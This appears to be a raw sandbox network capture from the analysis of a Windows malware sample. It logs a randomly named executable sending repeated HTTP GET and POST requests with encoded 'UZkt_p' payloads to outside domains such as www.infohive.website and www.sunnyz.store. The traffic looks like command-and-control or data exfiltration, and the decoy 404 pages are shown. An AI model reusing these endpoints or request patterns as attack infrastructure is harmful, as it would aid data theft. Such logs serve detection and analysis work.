                                                    Dec 13, 2024 13:08:04.086200953 CET597OUTGET /2mep/?Er=qt9d5V&UZkt_p=Qs7dTkG74ZlbzDPIks80sLprU65g+bEtyeoxhvOotfrZ9WhcV54Y9rQsYH5lTs77muDKHbL5HIFuHfk3BCfdk4oV88xQLJu313/wS+c/dWkGwsg/R2WIJaTqq/By1MtUaaLvo6grX4O5 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.127358.win
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Dec 13, 2024 13:08:05.631333113 CET691INHTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:05 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.74994166.29.149.46806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:11.486176968 CET877OUTPOST /cnve/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.infohive.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 219
                                                    Cache-Control: no-cache
                                                    Origin: http://www.infohive.website
                                                    Referer: http://www.infohive.website/cnve/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6b 44 64 5a 65 30 37 36 5a 34 74 2b 51 70 44 6b 59 63 36 44 6a 72 36 32 49 56 4d 38 76 69 48 37 67 5a 51 52 52 57 52 53 54 66 65 4e 4d 52 68 55 61 58 48 6b 61 63 41 64 6f 6e 47 74 4a 76 56 61 36 73 4a 57 63 38 42 51 46 58 77 74 56 31 61 57 31 74 50 57 64 61 6f 39 4a 52 42 76 74 74 46 56 50 53 35 56 72 6e 65 76 6d 39 46 73 55 75 58 2b 78 62 33 76 69 6b 62 62 54 64 69 7a 31 6f 6b 71 4e 6e 76 68 58 76 4f 71 4e 51 55 52 4f 61 65 65 47 42 7a 33 4d 5a 71 75 31 76 52 4b 74 31 61 34 72 65 55 6d 6f 71 73 68 65 74 52 6f 4e 78 65 73 50 39 55 46 6b 77 34 6e 72 62 4d 6f 6e 78 6f 62 73 64 44 63 73 41 3d 3d
                                                    Data Ascii: UZkt_p=7XryTos10RqWkDdZe076Z4t+QpDkYc6Djr62IVM8viH7gZQRRWRSTfeNMRhUaXHkacAdonGtJvVa6sJWc8BQFXwtV1aW1tPWdao9JRBvttFVPS5Vrnevm9FsUuX+xb3vikbbTdiz1okqNnvhXvOqNQUROaeeGBz3MZqu1vRKt1a4reUmoqshetRoNxesP9UFkw4nrbMonxobsdDcsA==
                                                    Dec 13, 2024 13:08:12.719862938 CET637INHTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:08:12 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.74994866.29.149.46806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:14.151283979 CET897OUTPOST /cnve/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.infohive.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 239
                                                    Cache-Control: no-cache
                                                    Origin: http://www.infohive.website
                                                    Referer: http://www.infohive.website/cnve/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 54 37 6e 37 49 52 51 54 39 53 55 66 65 4e 55 42 68 56 48 48 48 5a 61 63 4d 56 6f 6d 71 74 4a 76 42 61 36 70 74 57 63 50 35 50 58 33 77 76 64 56 61 55 2f 4e 50 57 64 61 6f 39 4a 52 56 4a 74 72 74 56 50 69 70 56 6b 6d 65 73 6c 39 46 6a 43 2b 58 2b 6d 72 33 6a 69 6b 61 4d 54 63 2f 6f 31 72 63 71 4e 6d 66 68 58 39 6d 70 44 51 56 59 54 4b 66 58 4f 55 43 64 50 4a 43 48 74 75 30 66 6f 6e 6e 54 6a 49 56 45 79 49 67 4e 41 38 70 54 4a 7a 36 61 59 62 4a 77 6d 78 38 2f 6d 35 34 4a 34 47 4e 78 68 50 69 59 36 38 76 42 73 4d 57 54 43 45 45 5a 73 4f 52 72 55 6f 50 70 45 54 38 3d
                                                    Data Ascii: UZkt_p=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQT7n7IRQT9SUfeNUBhVHHHZacMVomqtJvBa6ptWcP5PX3wvdVaU/NPWdao9JRVJtrtVPipVkmesl9FjC+X+mr3jikaMTc/o1rcqNmfhX9mpDQVYTKfXOUCdPJCHtu0fonnTjIVEyIgNA8pTJz6aYbJwmx8/m54J4GNxhPiY68vBsMWTCEEZsORrUoPpET8=
                                                    Dec 13, 2024 13:08:15.375128031 CET637INHTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:08:15 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.74995566.29.149.46806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:16.825684071 CET1910OUTPOST /cnve/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.infohive.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 1251
                                                    Cache-Control: no-cache
                                                    Origin: http://www.infohive.website
                                                    Referer: http://www.infohive.website/cnve/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 37 58 72 79 54 6f 73 31 30 52 71 57 6e 6a 74 5a 4e 44 6e 36 53 34 74 78 56 70 44 6b 52 38 37 49 6a 72 2b 32 49 55 35 6b 73 51 72 37 6e 49 41 52 52 77 6c 53 56 66 65 4e 4b 52 68 51 48 48 48 2b 61 66 38 52 6f 6e 58 61 4a 73 35 61 31 76 68 57 56 61 56 50 64 33 77 76 52 31 61 56 31 74 50 35 64 61 59 35 4a 52 46 4a 74 72 74 56 50 67 42 56 6a 33 65 73 6a 39 46 73 55 75 58 49 78 62 32 2b 69 6b 54 35 54 66 54 34 31 62 38 71 4f 46 33 68 57 4f 4f 70 50 51 56 57 51 4b 66 50 4f 55 47 47 50 4a 65 44 74 75 52 43 6f 6e 66 54 7a 4d 45 49 33 36 77 4b 63 74 52 30 4a 69 4b 68 58 59 68 38 6e 54 35 63 73 4a 59 76 77 47 70 76 34 75 4f 4a 78 35 32 37 77 66 32 42 4b 48 41 5a 73 62 73 41 48 4a 66 61 51 58 4d 45 4f 57 6f 50 69 55 62 77 6e 74 37 78 4e 63 36 38 75 45 76 4c 43 77 4a 75 6d 75 38 32 68 67 6f 38 7a 46 72 73 46 42 42 55 33 79 41 66 78 53 33 52 54 58 4e 71 66 47 6e 72 69 72 76 45 32 66 46 56 6b 4c 32 77 57 53 49 61 55 31 73 35 69 6a 43 75 2f 37 30 4f 32 53 4f 62 50 39 30 62 78 45 68 76 30 6f 2b [TRUNCATED]
                                                    Data Ascii: UZkt_p=7XryTos10RqWnjtZNDn6S4txVpDkR87Ijr+2IU5ksQr7nIARRwlSVfeNKRhQHHH+af8RonXaJs5a1vhWVaVPd3wvR1aV1tP5daY5JRFJtrtVPgBVj3esj9FsUuXIxb2+ikT5TfT41b8qOF3hWOOpPQVWQKfPOUGGPJeDtuRConfTzMEI36wKctR0JiKhXYh8nT5csJYvwGpv4uOJx527wf2BKHAZsbsAHJfaQXMEOWoPiUbwnt7xNc68uEvLCwJumu82hgo8zFrsFBBU3yAfxS3RTXNqfGnrirvE2fFVkL2wWSIaU1s5ijCu/70O2SObP90bxEhv0o+aCp0pyGmNdGpXLiPxk8nL75le1zERkXo0GYtYutfAdo3UQV1zc0BMULKAhk8rvw7itbMQUxTLHDQ+4nWaqI4U2RJbSlUvCpAIX8Jfoj+VDp60xqoUs8hqWrmtNNl2J6QWeLwrPSPJ7S73e/hGVcaEuqdwmNyl3dm0Q3pC+I9u7cacBDJwUn1Ub6RB/bvO36D0N0Lhnwvbx3JwgI7Yki9U1oQVUPd/w4n7tuDgJsXDM1Jnl3THeHUo2f0EfWobdDwF/smvtmGSKPzwCmkSrD+hquGELXlfM5rCvREXBACHXEsO7IkxfK9HjQL95GaEeMgn5ww/dbtumXfo0NQfBG/qny1y3fkcIuk/MiixDDf6IXKpayrgin6JawU50XGHmv5Drvuv7mMDBNFA1Dn4i2fxtN4LJUETlEyjb+QX6CQLn+Xl6Te0dy/JKX7dRyI2FTwHYQ2lvLx3ee1oN4GBLZqBZEEz6kwkMgNcx2lrbe036l1x52MXZnTxxuQ8BRIGcjaY7/z11GlVySK3o4q6+6ZZ20E4bUKZnmdVgmG76HA4XsJTiUVLGnctVJLXtAhAyVMqYHr+N0mO0zfK4yuNH/2/mg8OVYLpedXjAFN3rIJ9RA/+t8saJxlcTuWHxBEQUAebcdEeoS9rWVJTeEaeLlf2HfIavzXZYfNnz [TRUNCATED]
                                                    Dec 13, 2024 13:08:18.034415007 CET637INHTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:08:17 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.74996166.29.149.46806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:19.564925909 CET603OUTGET /cnve/?UZkt_p=2VDSQdlG5RaW3hcOSzrtXrxDd4bhZ8b1rLrGGnoiqQrQ5oU7TABHb8GSGDxsLG7YK+gXk2baIuNiiMBLfcdVYx8sa0WL+tT4casLEwE0iohoJSZhnQSJqMleUJfhtsmPpk3GYPvE1sgo&Er=qt9d5V HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.infohive.website
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Dec 13, 2024 13:08:20.715131044 CET652INHTTP/1.1 404 Not Found
                                                    Date: Fri, 13 Dec 2024 12:08:20 GMT
                                                    Server: Apache
                                                    Content-Length: 493
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.749978217.70.184.50806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:26.568495035 CET865OUTPOST /ead0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.sunnyz.store
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 219
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sunnyz.store
                                                    Referer: http://www.sunnyz.store/ead0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                    Data Raw: 55 5a 6b 74 5f 70 3d 44 79 50 79 68 6d 53 79 6c 67 74 6d 48 6d 61 55 71 57 6f 30 34 54 78 55 45 43 33 78 4a 36 45 6b 77 79 34 74 6a 79 43 73 48 4d 71 76 4c 41 6b 57 34 47 56 6c 2f 50 76 65 36 2b 57 38 75 55 51 48 36 47 6c 66 7a 42 36 31 39 39 41 58 63 36 69 67 78 53 2f 76 6b 38 6d 75 74 5a 55 6c 55 54 4b 68 67 58 42 35 4e 42 53 78 33 59 35 2f 6f 51 47 34 70 73 2f 46 37 57 51 75 72 34 4a 47 72 70 49 47 37 67 66 57 55 78 4a 34 4d 65 78 49 65 43 52 32 64 4f 47 4d 2f 2f 51 67 43 6e 65 56 63 6c 30 6e 79 6e 48 62 30 41 54 30 63 4d 62 68 48 58 51 47 51 37 52 4c 56 67 37 5a 67 67 57 37 2b 77 51 6f 64 65 59 58 34 65 64 2b 70 6c 63 65 2b 59 6d 57 4e 41 3d 3d
                                                    Data Ascii: UZkt_p=DyPyhmSylgtmHmaUqWo04TxUEC3xJ6Ekwy4tjyCsHMqvLAkW4GVl/Pve6+W8uUQH6GlfzB6199AXc6igxS/vk8mutZUlUTKhgXB5NBSx3Y5/oQG4ps/F7WQur4JGrpIG7gfWUxJ4MexIeCR2dOGM//QgCneVcl0nynHb0AT0cMbhHXQGQ7RLVg7ZggW7+wQodeYX4ed+plce+YmWNA==
                                                    Dec 13, 2024 13:08:27.793652058 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                    Server: nginx
                                                    Date: Fri, 13 Dec 2024 12:08:27 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                    Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.749985217.70.184.50806896C:\Program Files (x86)\QQCLGVgRClRwYvNyIwVjJCpmPkEDvXQBFFCodxdWuHlaIKzcNFTvxkEs\LcmEonpIrfS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 13, 2024 13:08:29.229239941 CET885OUTPOST /ead0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.5
                                                    Host: www.sunnyz.store
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Content-Length: 239
                                                    Cache-Control: no-cache
                                                    Origin: http://www.sunnyz.store
                                                    Referer: http://www.sunnyz.store/ead0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
